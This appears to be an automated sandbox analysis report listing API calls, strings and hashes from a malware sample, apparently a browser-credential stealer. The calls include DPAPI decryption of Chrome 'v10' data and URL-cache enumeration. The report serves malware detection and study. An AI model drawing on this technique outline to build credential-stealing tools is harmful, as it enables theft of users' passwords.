                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                                                                                                                                      • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                      • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                      • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                                                      • String ID: chp$v10
                                                                                                                                                                                                                                      • API String ID: 1297422669-2783969131
                                                                                                                                                                                                                                      • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E3EC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E407
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E422
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E43D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                                      • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                      • String ID: bhv
                                                                                                                                                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                      • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                      • API String ID: 2941347001-70141382
                                                                                                                                                                                                                                      • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                                      • String ID: visited:
                                                                                                                                                                                                                                      • API String ID: 2470578098-1702587658
                                                                                                                                                                                                                                      • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                                                                                      Control-flow Graph

control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1f3 call 406e8f 726->729 732 40e1f8-40e1fa 729->732 733 40e270-40e27d call 406b53 732->733 734 40e1fc-40e219 call 40dd50 * 2 732->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040BC75
• memset.MSVCRT ref: 0040BC8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
• memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
• memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
• LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
Strings
Memory Dump Source
• Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
• String ID:
• API String ID: 115830560-3916222277
• Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
• Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
• Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Control-flow Graph

control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID: |A
• API String ID: 77810686-1717621600
• Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
